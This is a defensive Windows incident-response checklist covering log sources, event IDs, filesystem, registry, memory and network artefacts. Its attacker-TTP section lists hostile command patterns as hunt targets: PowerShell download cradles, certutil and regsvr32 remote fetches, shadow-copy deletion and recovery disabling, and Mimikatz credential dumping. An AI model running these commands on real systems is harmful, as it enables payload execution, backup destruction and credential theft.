Windows DFIR • Networked Environment

Incident Investigation
Walkthrough & Checklist

Step-by-step artefact collection & analysis guide // Windows endpoints + network infrastructure
Log sources • Event IDs • MFT/USN • Registry • Memory • Network • Threat Actor TTPs

Investigation Progress
0 / 0 complete
PHASE 01
Scoping & Initial Response
Before touching the environment
⚠ Evidence Integrity Warning

Live triage modifies timestamps, pagefile, and memory. Always document your actions. Collect volatile data first. Never run tools directly from suspect media.

Case Initialisation
Document initial alert/report source and timestamp
Record detection method: EDR alert, SIEM rule, user report, threat intel, third-party notification
Open formal incident case, assign severity (P0–P4)
Trigger IMT if P0/P1. Notify CISO/DPO if personal data at risk (UK GDPR 72hr clock starts)
CRITICAL
Identify affected systems, users, and business services
Asset owner, criticality tier, connected dependencies, data classification of hosted data
Confirm investigation legal authority / scope of access
Employment contracts, BYOD considerations, legal hold requirements, cloud jurisdiction
Establish chain of custody for all acquired evidence
Hash all acquired images (SHA-256). Label physical/digital media. CoC form completed per exhibit
Scoping Questions
Determine approximate time of compromise (T0)
Earliest known indicator. Work backwards from detection. Define log lookback window
Identify initial access vector (phishing, exposed service, supply chain, insider)
Review: email logs, proxy/firewall, VPN auth, RDP exposure, vulnerable service versioning
CRITICAL
Confirm whether active threat actor presence is suspected
If yes: consider isolation strategy, comms channel security, avoid tipping off TA
Identify blast radius: lateral movement / domain compromise suspected?
Check: AD replication, Kerberos tickets, Golden/Silver ticket indicators, admin share usage
Confirm data exfiltration: is data at risk or confirmed exfiltrated?
DLP alerts, large outbound transfers, cloud sync activity, staging directories
PHASE 02
Log Source Collection
Preserve before requesting; timestamps degrade
Windows Endpoint Logs
Security event log — Security.evtx
Authentication, privilege use, object access, policy changes. Location: %SystemRoot%\System32\winevt\Logs\Security.evtx
System event log — System.evtx
Service installs, driver loads, boot events, crashes, USB device connections
Application event log — Application.evtx
App crashes, AV detections, installer events, .NET runtime errors
PowerShell Operational & Script Block logs
Microsoft-Windows-PowerShell%4Operational.evtx
Microsoft-Windows-PowerShell%4Analytic.etl
Script block logging (EID 4104) captures deobfuscated PS content
CRITICAL
Sysmon event log (if deployed)
Microsoft-Windows-Sysmon%4Operational.evtx — Process create, network conn, file create, registry, DNS queries, pipe events
WMI Activity & Microsoft-Windows-WMI-Activity logs
WMI subscriptions used for persistence. Check WBEM\Repository binaries
Task Scheduler log — Microsoft-Windows-TaskScheduler%4Operational.evtx
EID 106 (task created), 200 (task executed). Review %SystemRoot%\System32\Tasks\
RDP/Terminal Services logs
Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx — session connect/disconnect/reconnect
Windows Defender / AV operational log
Microsoft-Windows-Windows Defender%4Operational.evtx — detections, real-time protection state, exclusions added
Bits Client operational log
Microsoft-Windows-Bits-Client%4Operational.evtx — BITS used for stealthy downloads (living-off-the-land)
Network & Infrastructure Logs
Firewall logs (perimeter & host-based)
Inbound/outbound connections, blocked traffic, port scans. Correlate with endpoint artefacts for C2 IPs
CRITICAL
Proxy / web gateway logs
HTTP/HTTPS destinations, user-agent strings, referrers, POST body sizes. Look for DGA domains, beaconing patterns
DNS logs (resolver + recursive)
DNS tunnelling (high-entropy subdomains, large TXT records), DGA lookups, unusual PTR queries
VPN / remote access authentication logs
Source IPs, geolocations, authentication timestamps, concurrent sessions, impossible travel
Network flow data (NetFlow / IPFIX / sFlow)
Traffic volume anomalies, lateral movement between hosts, port scans, data staging volumes
Active Directory / LDAP logs (DC Security logs)
Account creation, group membership changes, GPO modifications, replication events, DCSync activity
Email gateway / MTA logs
Phishing delivery, header anomalies, attachment types, sender reputation, forwarding rules set by attackers
DHCP logs — lease history for IP-to-hostname mapping
Essential for attributing network activity to specific endpoints. Rogue DHCP servers indicate network compromise
EDR telemetry (CrowdStrike, Defender for Endpoint, SentinelOne)
Process trees, network connections, file writes, parent-child anomalies, AMSI events
Cloud / Identity Logs
Azure AD / Entra ID sign-in & audit logs
MFA bypass, legacy auth, conditional access failures, OAuth app consent grants, guest account activity
Microsoft 365 Unified Audit Log (UAL)
Email rules, Teams messages, SharePoint file access, mail forwarding, eDiscovery searches by attacker
PHASE 03
Key Windows Event IDs
What to hunt in Security.evtx and beyond
Authentication & Account Activity
Logon / Logoff events reviewed
4624 Successful logon (check logon type: 3=network, 10=RemoteInteractive)
4625 Failed logon — brute force indicator
4634 Logoff
4648 Explicit credentials logon (runas / pass-the-hash pivot)
4672 Special privileges assigned — admin logon
CRITICAL
Kerberos authentication events reviewed
4768 TGT requested
4769 Service ticket requested (look for RC4 encryption — downgrade attack)
4771 Kerberos pre-auth failed — password spray
4776 NTLM auth — lateral movement indicator
Account creation and privilege changes
4720 User account created
4728/4732 Member added to security group
4756 Member added to universal group
4738 User account changed
4723/4724 Password reset
Account lockout events (source workstation logged)
4740 Account locked out — source workstation field identifies spray origin. Check on DCs
Process & Command Execution
Process creation (command line auditing enabled)
4688 Process created with full command line (requires audit policy)
Sysmon EID 1 provides richer data including parent process, hashes
Look for: cmd.exe spawning from Office apps, unusual parent-child chains
CRITICAL
PowerShell script block logging reviewed
4104 Script block (deobfuscated content)
4103 Module logging
400/800 Engine started/stopped — console host history at %AppData%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Scheduled task creation / modification
4698 Scheduled task created
4702 Scheduled task updated
106/200 Task Scheduler operational log
Service installation events
4697 Service installed (Security log)
System 7045 New service installed — common for malware persistence
7036 Service started/stopped
Object Access & Privilege Use
Sensitive privilege use (credential access)
4673 Sensitive privilege use (SeDebugPrivilege = LSASS dumping)
4674 Operation attempt on privileged object
4611 Trusted logon process registered
File share / SMB access events on servers
5140 Network share accessed
5145 File access check on share (noisy but detailed)
5142/5143 Share created/modified
Registry key modification (if SACL enabled)
4657 Registry value modified
Sysmon EID 12/13/14 — more reliable registry monitoring
Audit policy changes
4719 System audit policy changed — attacker covering tracks
1102 Audit log cleared
104 System log cleared (System log)
Network & Firewall Events
Sysmon network connection events
Sysmon EID 3 — outbound connections with process name, destination IP/port. Essential for C2 mapping
Windows Firewall operational log
5156/5158 Connection allowed (WFP)
5157/5159 Connection blocked
4946/4947 Firewall rule added/modified
RDP / remote session events
21 RDP session logon (LocalSessionManager)
25 RDP session reconnect
1149 RDP user auth (RDPCoreTS — check for lateral movement source IP)
DNS query log (Sysmon EID 22)
Sysmon EID 22 — DNS queries by process. Identify C2, DGA, and data exfil over DNS
Sysmon Quick Reference
Key Sysmon Event IDs

1 Process create   2 File creation time change   3 Network connection   5 Process terminated   6 Driver loaded   7 Image (DLL) loaded   8 CreateRemoteThread (injection)   10 Process access (credential dump)   11 File create   12/13/14 Registry   15 File stream create (ADS)   17/18 Named pipe   22 DNS query   23 File delete   25 Process tampering   26 File delete detected

PHASE 04
Filesystem Artefacts
MFT, USN Journal, Prefetch, LNK, Shellbags & more
MFT ($MFT) Analysis
About the MFT

The Master File Table is the definitive record of every file on an NTFS volume. Each MFT entry stores timestamps ($STANDARD_INFORMATION and $FILE_NAME), file size, attributes, and file existence even post-deletion (until overwritten). Tool: MFTECmd, Autopsy, KAPE.

Acquire raw MFT from target volume
MFTECmd.exe -f $MFT --csv output_dir
Use KAPE or raw copy — cannot be done from running OS normally
CRITICAL
Look for timestomping: $SI vs $FN timestamp discrepancy
$STANDARD_INFORMATION can be modified by tools like Meterpreter/timestomp. $FILE_NAME is kernel-maintained and harder to fake. Discrepancy >1s is suspicious
Identify files created in suspicious directories during incident window
Focus: %TEMP%, %AppData%\Roaming, C:\ProgramData, C:\Windows\Temp, C:\Users\Public, Recycle Bin
Check for Alternate Data Streams (ADS) hiding payloads
streams.exe -s C:\ or Get-Item * -Stream * in PS. Sysmon EID 15. Zone.Identifier stream indicates downloaded files
Review deleted file records (MFT entries with $FILE_NAME but no $DATA)
MFT entry persists after deletion. Files recoverable until clusters overwritten. Check Recycle Bin $I / $R records
USN Change Journal ($J)
About the USN Journal

The Update Sequence Number journal records every file system operation (create, rename, delete, write, extend, security change) with a timestamp. It acts as a near-complete filesystem activity log. Persists independently of file deletion. Essential for proving file lifecycle. Tool: MFTECmd, fsutil usn.

Acquire and parse USN Journal
MFTECmd.exe -f $J --csv output_dir
Provides rename chains, temp file patterns, and deletion timestamps
Identify renamed executables and double-extension tricks
USN records rename operations with before/after names. Find: invoice.pdf → invoice.pdf.exe, LOLBINs renamed to benign names
CRITICAL
Correlate USN timestamps with event log activity during T0 window
File activity during known compromise window corroborates timeline. Tool: Timeline Explorer (EricZimmerman)
Prefetch & Execution Evidence
Parse Prefetch files for execution history
C:\Windows\Prefetch\*.pf — Tool: PECmd.exe
Provides: executable name, run count, last 8 run times, files loaded. Evidence even if executable deleted
CRITICAL
Check AmCache.hve for program execution and file hash
C:\Windows\AppCompat\Programs\Amcache.hve — stores SHA-1 hash of executables. Tool: AmcacheParser.exe
ShimCache / AppCompatCache — application compatibility registry
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache — evidence of execution (server 2012+). Tool: AppCompatCacheParser.exe
SRUM database (System Resource Usage Monitor)
C:\Windows\System32\sru\SRUDB.dat — records per-app CPU, memory, network usage for 30-60 days. Proves execution even if no prefetch. Tool: SrumECmd
User Activity Artefacts
LNK files (shortcut files) — evidence of file access
%AppData%\Microsoft\Windows\Recent\ — stores MAC timestamps of target file at time of access. Tool: LECmd.exe
Jump Lists — recent files per application
%AppData%\Microsoft\Windows\Recent\AutomaticDestinations\ — per-app recent file access. Tool: JLECmd.exe
Shellbags — directory traversal evidence
USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU — records folders opened even from deleted/external media. Tool: SBECmd
Browser history / download records
Chrome: %LocalAppData%\Google\Chrome\User Data\Default\History
Edge: %LocalAppData%\Microsoft\Edge\User Data\Default\History — SQLite DBs
Recycle Bin ($I / $R records)
C:\$Recycle.Bin\[SID]\ — $I file stores original path, deletion timestamp, file size. $R contains actual file content
PHASE 05
Registry Forensics
Persistence, credential access, lateral movement indicators
Persistence Mechanisms
Run / RunOnce keys reviewed
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Check both 64-bit and 32-bit hives (Wow6432Node)
CRITICAL
Services registry hive
HKLM\SYSTEM\CurrentControlSet\Services — malicious services with ImagePath pointing to payloads. Check for recently modified entries
Winlogon hijacking keys
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Check: Userinit, Shell, Notify values for appended executables
Image File Execution Options (IFEO) — debugger hijacking
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options — Debugger value redirects binary execution (accessibility feature abuse: sethc.exe, utilman.exe)
AppInit_DLLs — DLL injection on any user-mode process
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs — Should be empty in legitimate environments
COM object hijacking
HKCU\Software\Classes\CLSID\ — user-writable COM registrations that override system defaults. Used for UAC bypass and persistence
User Activity & Lateral Movement
MRU lists — most recently used files/commands
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU — commands run via Win+R
Network shares and mapped drives (MountPoints2)
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 — records connected network shares including UNC paths to attacker infrastructure
TypedURLs — manually typed browser URLs
HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs — useful if malware infrastructure accessed via browser
USB / removable media history
HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR — device VID/PID, serial, first/last connection
HKLM\SOFTWARE\Microsoft\Windows Portable Devices\Devices
SAM & SECURITY hive — local account and credential policy
HKLM\SAM — local user accounts (access requires SYSTEM). HKLM\SECURITY\Cache — cached domain credentials (DCCACHE). Requires offline parsing: secretsdump, impacket
Last write time on registry keys as timeline evidence
Registry hive key last-write timestamps survive reboots. Tool: RegRipper, RegistryExplorer. Cross-correlate with T0 window
PHASE 06
Memory Forensics
Volatile, lost on reboot — prioritise if system still live
⚠ Acquisition Priority — Live System

Memory must be captured before any reboot or shutdown. Use: WinPmem, DumpIt, Magnet RAM Capture, or EDR built-in. Hash immediately. Memory analysis tools: Volatility 3, Rekall.

Process & Injection Analysis
Run pslist / pstree — identify rogue/orphaned processes
vol3 -f dump.raw windows.pslist / windows.pstree
Look for: cmd.exe under svchost, powershell spawned by Word/Excel, unusual parent PIDs
CRITICAL
psscan — detect DKOM-hidden processes
vol3 windows.psscan — scans pool tags rather than walking EPROCESS list. Processes in psscan but not pslist = rootkit hiding
malfind — detect injected shellcode and PE headers
vol3 windows.malfind — identifies VAD regions that are executable, not mapped to disk, and contain PE headers or shellcode. High-confidence injection indicator
CRITICAL
dlllist / ldrmodules — detect hidden/unlinked DLLs
vol3 windows.dlllist — compare against ldrmodules to find DLLs present in VAD but not in PEB loader lists (reflective DLL injection)
handles — open file handles and registry keys per process
vol3 windows.handles --pid [PID] — reveals C2 socket handles, staging file handles, mutex names (malware fingerprints)
Network & Credential Recovery
netstat — active and listening connections in memory
vol3 windows.netstat — shows established connections with associated process. Identify C2 IPs and ports active at acquisition time
LSASS process memory — credential extraction evidence
vol3 windows.lsadump / check for LSASS minidumps on disk (C:\Windows\Temp\lsass.dmp)
Evidence of Mimikatz, ProcDump, comsvcs.dll MiniDump technique
CRITICAL
cmdline / cmdscan — command history from memory
vol3 windows.cmdline / windows.cmdscan — recover commands from console hosts, including those not written to disk
Strings / YARA scan for IOCs in full memory dump
vol3 windows.strings — extract readable strings. Run YARA rules against raw dump for known malware signatures, C2 domains, API key strings
Dump suspicious processes / injected regions for static analysis
vol3 windows.dumpfiles --pid [PID] — extract process executables and DLLs for AV scanning, hashing, OSINT lookup on VirusTotal
PHASE 07
Network Forensics
C2, lateral movement, exfil — across the wire
C2 & Beaconing Detection
Identify periodic/regular outbound connections (beaconing)
Run beacon analysis over proxy/firewall logs. Tools: RITA, Zeek + Bro scripts. Look for: consistent jitter, small payload size, long connection duration
CRITICAL
Analyse user-agent strings for non-browser processes making HTTP/S requests
Cobalt Strike default: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0). PowerShell WinHTTP, curl-style strings from svchost are suspicious
DNS tunnelling / DGA domain analysis
High entropy subdomains, large TXT record responses, unusually high query rate. Tools: DNSTwist, frequency analysis. Check: iodine, dnscat2 patterns
SSL/TLS certificate analysis on C2 connections
Self-signed certs, short validity, unusual SNI, mismatched CN. JA3/JA3S fingerprinting for TLS client/server fingerprints
PCAP analysis of suspicious sessions
Wireshark / Zeek. Extract files, credentials, commands. Look for: SMB lateral movement, LDAP recon queries, impacket tool signatures
Lateral Movement & Exfiltration
SMB lateral movement — admin share connections (ADMIN$, C$, IPC$)
Net flow data: SMB (445/tcp) connections between internal hosts. Correlate: 4624 logon type 3 + 5140 (share access) on target + source event 4648
CRITICAL
WMI remote execution — DCOM/RPC lateral movement
Port 135/tcp (DCOM), dynamic high ports. Source: wmic.exe /node:[TARGET], impacket wmiexec. Look for: wmiprvse.exe spawning cmd.exe on target
RDP lateral movement from compromised hosts
Internal RDP (3389/tcp) between hosts — unusual if not expected. Correlate with 4624 type 10 (RemoteInteractive) on destination
Data staging and exfil volume analysis
Large sustained outbound data transfers to single destination. Cloud storage (Mega, Dropbox, rclone). Port 443 to IP without SNI. Estimate data volume in GB
ICMP/non-standard protocol covert channels
Unusual ICMP payload sizes, abnormal packet rates. Non-standard port usage by known processes (e.g. svchost on port 53 without DNS process)
PHASE 08
Threat Actor TTPs & Tooling
Common attacker toolkits, living-off-the-land, and ATT&CK mapping
Common Attacker Tooling — Check for Artefacts
Cobalt Strike beacon evidence
Indicators: named pipes (MSSE-*-server, postex_*), shellcode in injected processes, sleep masking (stomped memory), characteristic HTTP/S malleable C2 profiles, default ports (50050 team server)
CRITICAL
Mimikatz credential dumping evidence
EID 4673 (SeDebugPrivilege), Sysmon EID 10 (LSASS access)
Artefacts: sekurlsa::logonpasswords strings in memory, LSASS dump files, mimilib.dll in SYSTEM32
BloodHound / SharpHound AD enumeration
Massive LDAP query burst from single host, queries for AdminTo/CanRDPTo/HasSession. LDAP port 389/636 spike. Event: 4662 (AD object access)
Impacket toolkit (secretsdump, psexec, wmiexec, smbexec)
Artefacts: service name BTOBTO (psexec), randomised service names, RemCom strings, SMB file writes of *.exe to ADMIN$
Python-based — may leave impacket strings in network traffic
Rclone / MEGAcmd / cloud exfil tool evidence
Prefetch for rclone.exe, mega.exe. Config files: %AppData%\rclone\rclone.conf. Large sustained HTTPS transfers to cloud storage CDN IPs
Netscan / Advanced Port Scanner / SoftPerfect
Discovery tools with prefetch artefacts, large numbers of failed connection events across internal IP ranges in a short window
AnyDesk / TeamViewer / ScreenConnect — RMM abuse
Prefetch, install logs, process create events. Used for persistent remote access, often installed post-initial-access before C2 established
Living-off-the-Land (LOLBin) Abuse
PowerShell — encoded commands, download cradles, bypass flags
Flags to hunt: -EncodedCommand, -ExecutionPolicy Bypass, -WindowStyle Hidden, -NonInteractive
Download cradles: IEX (New-Object Net.WebClient).DownloadString(), Invoke-Expression
CRITICAL
certutil.exe — file download and base64 decode
certutil -decode, certutil -urlcache -split -f [URL] — used to fetch and decode payloads. Check prefetch and 4688 command line
mshta.exe / wscript.exe / cscript.exe — script execution
Execute HTA, VBS, JS payloads. Look for: mshta http://, wscript C:\Temp\. Common initial access post-phishing payload delivery
rundll32.exe / regsvr32.exe — DLL execution
rundll32 shell32.dll,ShellExec_RunDLL, regsvr32 /s /n /u /i:http:// (Squiblydoo)
Parent process and command line critical for triage
wmic.exe — WMI remote execution and reconnaissance
wmic /node:[TARGET] process call create "[cmd]" for lateral movement. wmic shadowcopy delete for ransomware VSS deletion
bitsadmin.exe / curl.exe — file downloads
bitsadmin /transfer for persistent background downloads. curl -o payload delivery. Leaves BITS job entries and BITS operational log events
VSS deletion — ransomware pre-encryption step
Commands: vssadmin delete shadows /all /quiet, wmic shadowcopy delete, bcdedit /set {default} recoveryenabled no
EID 4688 with these command lines = imminent encryption event
ATT&CK Coverage Confirmation
Map all identified TTPs to MITRE ATT&CK techniques
Produces structured timeline for report, identifies gaps in coverage, supports threat actor attribution and TI output
Assess detection gaps — what was missed by existing controls?
Document: dwell time, why initial access wasn't detected, SIEM rule gaps, EDR coverage holes. Feeds containment review and lessons learned
Produce confirmed IOC list: IPs, hashes, domains, mutexes, paths
Format for STIX/TAXII or direct SIEM/EDR block list ingestion. Notify threat intel team for wider distribution if appropriate
Windows DFIR Walkthrough • Networked Environment // v1.0 0 / 0 checks complete